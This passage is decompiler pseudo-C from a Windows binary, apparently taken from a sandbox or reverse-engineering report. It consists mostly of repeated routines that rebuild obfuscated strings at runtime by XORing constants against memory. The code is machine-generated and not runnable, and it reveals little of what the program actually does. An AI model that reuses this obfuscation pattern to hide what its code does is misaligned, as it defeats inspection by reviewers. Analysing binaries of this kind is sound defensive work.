				if ( *((intOrPtr*)( *((intOrPtr*)(_t2504 + 0x298)) + 0x48)) -  *((intOrPtr*)( *((intOrPtr*)(_t2504 + 0x298)) + 0x58)) - _t2634 < 0) goto 0x68b841cf;
				_t2337 =  *((intOrPtr*)(_t2504 + 0x298));
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t2337 + 0x58)) =  *((intOrPtr*)(_t2337 + 0x58)) + _t2634;
				_t2635 = _t2337;
				 *(_t2504 + 0x370) = 0;
				_t1798 =  *((intOrPtr*)(_t2504 + 0x398));
				if ( *((intOrPtr*)(_t2337 + 0x60)) -  *((intOrPtr*)(_t2337 + 0x70)) - _t1798 < 0) goto 0x68b841f0;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t2635 + 0x70)) =  *((intOrPtr*)(_t2635 + 0x70)) + _t1798;
				 *((long long*)(_t2504 + 0x398)) = 0;
				if ( *((intOrPtr*)(_t2635 + 0x78)) -  *((intOrPtr*)(_t2635 + 0x88)) - _t2445 < 0) goto 0x68b8420a;
				memcpy(??, ??, ??);
				 *((intOrPtr*)(_t2635 + 0x88)) =  *((intOrPtr*)(_t2635 + 0x88)) + _t2445;
				 *(_t2504 + 0x350) = 0;
				E00007FF77FF768B79C3F();
				E00007FF77FF768B79ACC(); // executed
				E00007FF77FF768B79B23();
				if ( *((intOrPtr*)(_t2504 + 0x2b0)) == 0) goto 0x68b841af;
				HeapFree(??, ??, ??);
				_t1800 = _t2504 + 0x210;
				if ( *((intOrPtr*)(_t2504 + 0x3a8)) !=  *((intOrPtr*)(_t2504 + 0x3b0))) goto 0x68b836af;
				goto 0x68b84227;
				E00007FF77FF768DB92F6( *((intOrPtr*)(_t2504 + 0x3a8)) -  *((intOrPtr*)(_t2504 + 0x3b0)),  *((intOrPtr*)(_t2504 + 0x358)), _t2660, _t2635);
				_t1666 =  *((intOrPtr*)(_t2504 + 0x298));
				goto 0x68b8408d;
				E00007FF77FF768DB915D( *((intOrPtr*)(_t2504 + 0x3a8)) -  *((intOrPtr*)(_t2504 + 0x3b0)),  *((intOrPtr*)(_t2504 + 0x420)),  *((intOrPtr*)(_t1666 + 0x58)), _t1800);
				goto 0x68b840ec;
				_t1164 = E00007FF77FF768DB9099( *((intOrPtr*)(_t2504 + 0x3a8)) -  *((intOrPtr*)(_t2504 + 0x3b0)),  *((intOrPtr*)(_t2504 + 0x378)),  *((intOrPtr*)(_t2635 + 0x70)), _t2445);
				goto 0x68b8412b;
				E00007FF77FF768B7996A();
				0x68bdd324();
				asm("xorps xmm6, xmm6");
				asm("movaps [esp+0x160], xmm6");
				 *((long long*)(_t2504 + 0x170)) = 0;
				 *(_t2504 + 0x178) = 0x68e2f500;
				 *((long long*)(_t2504 + 0x180)) = _t1666;
				 *((long long*)(_t2504 + 0x188)) =  *((intOrPtr*)(_t2635 + 0x88));
				 *(_t2504 + 0x30) = 0x68db5c5d;
				 *(_t2504 + 0x30) = 0x57d9cd42;
				_t2158 =  *(_t2504 + 0x30);
				E00007FF77FF768B7CD45(_t1164, 0,  *(_t2504 + 0x30), _t2158);
				_t1166 = E00007FF77FF768BEFD87(0x57d9cd42,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x57d9cd42;
				 *(_t2504 + 0xf8) = _t2158;
				 *_t2158 = 0x14b6ff87 ^  *0x57d9cd42;
				_t2158[1] = 0x0fe26dca ^  *0xA3B8E3AB57D9CD4A;
				_t2158[1] =  *0xA3B8E3AB57D9CD4E ^ 0x00000007;
				 *((long long*)(_t2504 + 0x100)) = 0xd;
				 *(_t2504 + 0x30) = 0x68dbc2ae;
				 *(_t2504 + 0x30) = 0x22844bdf;
				E00007FF77FF768B7D214(_t1166, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("movaps [esp+0x30], xmm6");
				asm("movaps [esp+0x40], xmm6");
				_t2447 =  *0x7FF768DC2848 ^  *0xC52E9D2622844BDF;
				 *(_t2504 + 0x30) = _t2447;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84339;
				E00007FF77FF768BEFD87(0x22844bdf, 0);
				_t2588 = _t2504 + 0x210;
				 *_t2588 = 0x22844bdf;
				 *((long long*)(_t2588 + 8)) = 0x68dc2848;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2588 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2534 =  *((intOrPtr*)(_t2504 + 0x1a8));
				if (_t2534 == 0) goto 0x68b843c7;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b843c7;
				_t1169 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbcf82;
				 *(_t2504 + 0x30) = 0x4ebdc184;
				E00007FF77FF768B7BF98(_t1169, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2294 + 0x68dc2868) & 0x000000ff;
				r11d =  *((_t2294 | 0x00000002) + 0x68dc2868) & 0x000000ff;
				r14d =  *((_t2294 | 0x00000003) + 0x68dc2868) & 0x000000ff;
				_t2165 = (_t2294 | 0x00000007) << 0x38;
				_t2652 = _t2504 + 0x1a0 << 0x18;
				_t2620 = __r11 << 0x10;
				_t1808 = (_t1800 << 0x00000008 | _t2534 | _t2620 | _t2652 | (_t2294 | 0x00000004) << 0x00000020 | _t2447 << 0x00000028 | (_t2294 | 0x00000006) << 0x00000030 | _t2165) ^  *(0x4ebdc184 + _t2294);
				 *(_t2504 + _t2294 + 0x2d0) = _t1808;
				r9d = 0;
				if ((r9b & 0x00000001) != 0) goto 0x68b84408;
				 *(_t2504 + 0x2e0) =  *0xF089178A4EBDC194 ^ 0x00000055;
				E00007FF77FF768BEFD87(0x4ebdc184, (_t2294 | 0x00000004) << 0x20);
				 *(_t2504 + 0xf0) = 0x4ebdc184;
				 *(_t2504 + 0xf8) = _t2165;
				asm("movaps xmm0, [esp+0x2d0]");
				asm("movups [edx], xmm0");
				 *((char*)(_t2165 + 0x10)) =  *(_t2504 + 0x2e0);
				 *((long long*)(_t2504 + 0x100)) = 0x11;
				 *(_t2504 + 0x30) = 0x68dc4129;
				 *(_t2504 + 0x30) = 0x41d3fc02;
				E00007FF77FF768B7C16F( *((_t2294 | 0x00000007) + 0x68dc2868) & 0x000000ff, 0x41d3fc02,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2879 ^  *0x419E927B41D3FC02;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8453f;
				E00007FF77FF768BEFD87(0x41d3fc02, 0);
				_t2589 = _t2504 + 0x210;
				 *_t2589 = 0x41d3fc02;
				 *((long long*)(_t2589 + 8)) = 0x68dc2879;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2589 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b845cd;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b845cd;
				_t1177 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db8131;
				 *(_t2504 + 0x30) = 0xf20120e9;
				_t2169 =  *(_t2504 + 0x30);
				E00007FF77FF768B7DA43(_t1177, 0,  *(_t2504 + 0x30), _t2169);
				_t1179 = E00007FF77FF768BEFD87(0xf20120e9,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xf20120e9;
				 *(_t2504 + 0xf8) = _t2169;
				 *_t2169 = 0xa70bc469 ^  *0xf20120e9;
				_t2169[1] =  *0x2FEB8CBCF20120F1 ^ 0x0000004f;
				 *((long long*)(_t2504 + 0x100)) = 9;
				 *(_t2504 + 0x30) = 0x68dc010a;
				 *(_t2504 + 0x30) = 0xda0ce3ed;
				E00007FF77FF768B7C9B4(_t1179, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2899 ^  *0x9B055B3BDA0CE3ED;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b8467b;
				E00007FF77FF768BEFD87(0xda0ce3ed, 0);
				_t2590 = _t2504 + 0x210;
				 *_t2590 = 0xda0ce3ed;
				 *((long long*)(_t2590 + 8)) = 0x68dc2899;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2590 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84709;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84709;
				_t1182 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db8339;
				 *(_t2504 + 0x30) = 0x2cea788a;
				_t2173 =  *(_t2504 + 0x30);
				E00007FF77FF768B7DEB2(_t1182, 0,  *(_t2504 + 0x30), _t2173);
				_t1184 = E00007FF77FF768BEFD87(0x2cea788a,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x2cea788a;
				 *(_t2504 + 0xf8) = _t2173;
				 *_t2173 = 0x21051234 ^  *0x2cea788a;
				_t2173[1] =  *0xA76F7C2F2CEA7892 ^ 0x000000fa;
				 *((long long*)(_t2504 + 0x100)) = 9;
				 *(_t2504 + 0x30) = 0x68db64a8;
				 *(_t2504 + 0x30) = 0xc8440f6b;
				E00007FF77FF768B7C4D8(_t1184, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC28B9 ^  *0x3246B3ECC8440F6B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b847b7;
				E00007FF77FF768BEFD87(0xc8440f6b, 0);
				_t2591 = _t2504 + 0x210;
				 *_t2591 = 0xc8440f6b;
				 *((long long*)(_t2591 + 8)) = 0x68dc28b9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2591 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84845;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84845;
				_t1187 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db8890;
				 *(_t2504 + 0x30) = 0x3d429041;
				_t2177 =  *(_t2504 + 0x30);
				E00007FF77FF768B7C337(_t1187, 0,  *(_t2504 + 0x30), _t2177);
				_t1189 = E00007FF77FF768BEFD87(0x3d429041,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x3d429041;
				 *(_t2504 + 0xf8) = _t2177;
				 *_t2177 = 0x5a6fbd16 ^  *0x3d429041;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68dc222d;
				 *(_t2504 + 0x30) = 0x436f9a4;
				E00007FF77FF768B7DD87(_t1189, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC28D9 ^  *0x48C3B7100436F9A4;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b848ea;
				E00007FF77FF768BEFD87(0x436f9a4, 0);
				_t2592 = _t2504 + 0x210;
				 *_t2592 = 0x436f9a4;
				 *((long long*)(_t2592 + 8)) = 0x68dc28d9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2592 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84978;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84978;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = "lumn out of bounds";
				 *(_t2504 + 0x30) = 0x373630ac;
				_t2181 =  *(_t2504 + 0x30);
				0x68b7c75b();
				_t1193 = E00007FF77FF768BEFD87(0x373630ac,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x373630ac;
				 *(_t2504 + 0xf8) = _t2181;
				 *_t2181 = 0x30a75439 ^  *0x373630ac;
				_t2181[1] =  *0x3F155D75373630B4 ^ 0x000000d8;
				 *((long long*)(_t2504 + 0x100)) = 9;
				 *(_t2504 + 0x30) = 0x68db5d39;
				 *(_t2504 + 0x30) = 0x2762292c;
				E00007FF77FF768B7CC66(_t1193, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC28F9 ^  *0xD12D5D772762292C;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84a26;
				E00007FF77FF768BEFD87(0x2762292c, 0);
				_t2593 = _t2504 + 0x210;
				 *_t2593 = 0x2762292c;
				 *((long long*)(_t2593 + 8)) = 0x68dc28f9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2593 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84ab4;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84ab4;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db78a0;
				 *(_t2504 + 0x30) = 0xe65f37a9;
				_t2185 =  *(_t2504 + 0x30);
				E00007FF77FF768B7BED7(_t2185);
				_t1197 = E00007FF77FF768BEFD87(0xe65f37a9,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xe65f37a9;
				 *(_t2504 + 0xf8) = _t2185;
				 *_t2185 = 0x73fb94c6 ^  *0xe65f37a9;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68db9b3a;
				 *(_t2504 + 0x30) = 0xecd51b78;
				E00007FF77FF768B7BFE2(_t1197, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2919 ^  *0xF1F76FEEECD51B78;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84b59;
				E00007FF77FF768BEFD87(0xecd51b78, 0);
				_t2594 = _t2504 + 0x210;
				 *_t2594 = 0xecd51b78;
				 *((long long*)(_t2594 + 8)) = 0x68dc2919;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2594 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84be7;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84be7;
				_t1200 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db46a7;
				 *(_t2504 + 0x30) = 0x847c4a79;
				_t2189 =  *(_t2504 + 0x30);
				E00007FF77FF768B7DC65(_t1200, 0,  *(_t2504 + 0x30), _t2189);
				_t1202 = E00007FF77FF768BEFD87(0x847c4a79,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x847c4a79;
				 *(_t2504 + 0xf8) = _t2189;
				_t2189[0] =  *0xEC5D43F3847C4A7D & 0x0000ffff ^ 0x0000f42b;
				 *_t2189 = 0x9d94fc45;
				 *((long long*)(_t2504 + 0x100)) = 6;
				 *(_t2504 + 0x30) = 0x68db4661;
				 *(_t2504 + 0x30) = 0x32a5a186;
				E00007FF77FF768B7CBF8(_t1202, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2939 ^  *0x968ED09632A5A186;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84c96;
				E00007FF77FF768BEFD87(0x32a5a186, 0);
				_t2595 = _t2504 + 0x210;
				 *_t2595 = 0x32a5a186;
				 *((long long*)(_t2595 + 8)) = 0x68dc2939;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2595 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84d24;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84d24;
				_t1205 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbe0cd;
				 *(_t2504 + 0x30) = 0xdd2fc88a;
				_t2193 =  *(_t2504 + 0x30);
				E00007FF77FF768B7DCDC(_t1205, 0,  *(_t2504 + 0x30), _t2193);
				_t1207 = E00007FF77FF768BEFD87(0xdd2fc88a,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xdd2fc88a;
				 *(_t2504 + 0xf8) = _t2193;
				 *_t2193 = 0x410cc3aa ^  *0xdd2fc88a;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68dbd649;
				 *(_t2504 + 0x30) = 0xd822277b;
				E00007FF77FF768B7D92A(_t1207, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2959 ^  *0xF6E42A5CD822277B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84dc9;
				E00007FF77FF768BEFD87(0xd822277b, 0);
				_t2596 = _t2504 + 0x210;
				 *_t2596 = 0xd822277b;
				 *((long long*)(_t2596 + 8)) = 0x68dc2959;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2596 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84e57;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84e57;
				_t1210 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dba49f;
				 *(_t2504 + 0x30) = 0xca308153;
				_t2197 =  *(_t2504 + 0x30);
				E00007FF77FF768B7BFBC(_t1210,  *(_t2504 + 0x30), _t2197);
				_t1212 = E00007FF77FF768BEFD87(0xca308153,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xca308153;
				 *(_t2504 + 0xf8) = _t2197;
				 *_t2197 = 0xb01d12c8 ^  *0xca308153;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68dc1b0e;
				 *(_t2504 + 0x30) = 0x9ab57f57;
				E00007FF77FF768B7CEB2(_t1212, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2979 ^  *0x84F735FE9AB57F57;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b84efc;
				E00007FF77FF768BEFD87(0x9ab57f57, 0);
				_t2597 = _t2504 + 0x210;
				 *_t2597 = 0x9ab57f57;
				 *((long long*)(_t2597 + 8)) = 0x68dc2979;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2597 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b84f8a;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b84f8a;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dba521;
				 *(_t2504 + 0x30) = 0xbe4f58d4;
				_t2201 =  *(_t2504 + 0x30);
				0x68b7d418();
				dil = dil ^ 0x0000006c;
				E00007FF77FF768BEFD87(0xbe4f58d4,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0xbe4f58d4;
				 *(_t2504 + 0xf8) = _t2201;
				 *_t2201 = 0x968af918 ^  *0xbe4f58d4;
				_t2201[1] =  *0xAED41832BE4F58DC & 0x0000ffff ^ 0x0000f0e5;
				_t2201[1] = dil;
				 *((long long*)(_t2504 + 0x100)) = 0xb;
				 *(_t2504 + 0x30) = 0x68db99c1;
				 *(_t2504 + 0x30) = 0x9d43908b;
				0x68b7c88d();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC2999 ^  *0xF54657F19D43908B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85049;
				E00007FF77FF768BEFD87(0x9d43908b, 0);
				_t2598 = _t2504 + 0x210;
				 *_t2598 = 0x9d43908b;
				 *((long long*)(_t2598 + 8)) = 0x68dc2999;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2598 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b850d7;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b850d7;
				_t1218 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dc007a;
				 *(_t2504 + 0x30) = 0x7bf8e2ea;
				_t2205 =  *(_t2504 + 0x30);
				E00007FF77FF768B7BF75(_t1218, 0,  *(_t2504 + 0x30), _t2205);
				_t1220 = E00007FF77FF768BEFD87(0x7bf8e2ea,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x7bf8e2ea;
				 *(_t2504 + 0xf8) = _t2205;
				 *_t2205 = 0x67b83666 ^  *0x7bf8e2ea;
				 *((long long*)(_t2504 + 0x100)) = 4;
				 *(_t2504 + 0x30) = 0x68dc06c6;
				 *(_t2504 + 0x30) = 0x6ce30012;
				E00007FF77FF768B7BE0B(_t1220, 0,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC29B9 ^  *0xDEAC59C86CE30012;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85175;
				E00007FF77FF768BEFD87(0x6ce30012, 0);
				_t2599 = _t2504 + 0x210;
				 *_t2599 = 0x6ce30012;
				 *((long long*)(_t2599 + 8)) = 0x68dc29b9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2599 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85203;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85203;
				_t1223 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68db8be3;
				 *(_t2504 + 0x30) = 0x8b89db0f;
				_t2209 =  *(_t2504 + 0x30);
				E00007FF77FF768B7DD17(_t1223, 0,  *(_t2504 + 0x30), _t2209);
				E00007FF77FF768BEFD87(0x8b89db0f,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x8b89db0f;
				 *(_t2504 + 0xf8) = _t2209;
				 *_t2209 = 0x5301e017 ^  *0x8b89db0f;
				 *((long long*)(_t2504 + 0x100)) = 8;
				 *(_t2504 + 0x30) = 0x68dc386c;
				 *(_t2504 + 0x30) = 0x6b3b225b;
				0x68b7d741();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC29D9 ^  *0x1BE3B0E36B3B225B;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b852a8;
				E00007FF77FF768BEFD87(0x6b3b225b, 0);
				_t2600 = _t2504 + 0x210;
				 *_t2600 = 0x6b3b225b;
				 *((long long*)(_t2600 + 8)) = 0x68dc29d9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2600 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85336;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85336;
				_t1227 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dc0261;
				 *(_t2504 + 0x30) = 0x762a529d;
				_t2213 =  *(_t2504 + 0x30);
				E00007FF77FF768B7C031(_t1227, 0,  *(_t2504 + 0x30), _t2213);
				E00007FF77FF768BEFD87(0x762a529d,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x762a529d;
				 *(_t2504 + 0xf8) = _t2213;
				 *_t2213 = 0x5b1df43d ^  *0x762a529d;
				_t2213[1] =  *0x3FF2457E762A52A5 ^ 0x00000010;
				 *((long long*)(_t2504 + 0x100)) = 9;
				 *(_t2504 + 0x30) = 0x68dbf02e;
				 *(_t2504 + 0x30) = 0xd15deb71;
				0x68b7e492();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				 *(_t2504 + 0x30) =  *0x7FF768DC29F9 ^  *0x5EB0EA4AD15DEB71;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b853e4;
				E00007FF77FF768BEFD87(0xd15deb71, 0);
				_t2601 = _t2504 + 0x210;
				 *_t2601 = 0xd15deb71;
				 *((long long*)(_t2601 + 8)) = 0x68dc29f9;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2601 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				if ( *((intOrPtr*)(_t2504 + 0x1a8)) == 0) goto 0x68b85472;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b85472;
				_t1231 = HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dc2734;
				 *(_t2504 + 0x30) = 0x514d6bd6;
				_t2217 =  *(_t2504 + 0x30);
				E00007FF77FF768B7CB76(_t1231, 0,  *(_t2504 + 0x30), _t2217);
				E00007FF77FF768BEFD87(0x514d6bd6,  *(_t2504 + 0x30));
				 *(_t2504 + 0xf0) = 0x514d6bd6;
				 *(_t2504 + 0xf8) = _t2217;
				 *_t2217 = 0x6d8c7b74 ^  *0x514d6bd6;
				_t2217[1] =  *0x49F5C648514D6BDE & 0x0000ffff ^ 0x00002396;
				 *((long long*)(_t2504 + 0x100)) = 0xa;
				 *(_t2504 + 0x30) = 0x68dc3d14;
				 *(_t2504 + 0x30) = 0x29fcd52;
				E00007FF77FF768B7CE48(0, 0x29fcd52,  *(_t2504 + 0x30),  *(_t2504 + 0x30));
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x30], xmm0");
				asm("movaps [esp+0x40], xmm0");
				_t2476 =  *0x7FF768DC2A19 ^  *0x376FB13E029FCD52;
				 *(_t2504 + 0x30) = _t2476;
				if (0xfffffff8 - 0x18 < 0) goto 0x68b85525;
				E00007FF77FF768BEFD87(0x29fcd52, 0);
				_t2602 = _t2504 + 0x210;
				 *_t2602 = 0x29fcd52;
				 *((long long*)(_t2602 + 8)) = 0x68dc2a19;
				asm("movaps xmm0, [esp+0x30]");
				asm("movaps xmm1, [esp+0x40]");
				asm("movups [edx], xmm0");
				asm("movups [edx+0x10], xmm1");
				 *((long long*)(_t2602 + 0x10)) = 0x20;
				E00007FF77FF768B74E32();
				_t2562 =  *((intOrPtr*)(_t2504 + 0x1a8));
				if (_t2562 == 0) goto 0x68b855b3;
				if ( *(_t2504 + 0x1a0) == 0) goto 0x68b855b3;
				HeapFree(??, ??, ??);
				 *(_t2504 + 0x30) = 0x68dbdbf5;
				 *(_t2504 + 0x30) = 0xf94de544;
				_t2221 =  *(_t2504 + 0x30);
				0x68b7d631();
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x2d0], xmm0");
				r9b = 1;
				r8d =  *(_t2221 + 0x68dc2a39) & 0x000000ff;
				r11d =  *((_t2221 | 0x00000002) + 0x68dc2a39) & 0x000000ff;
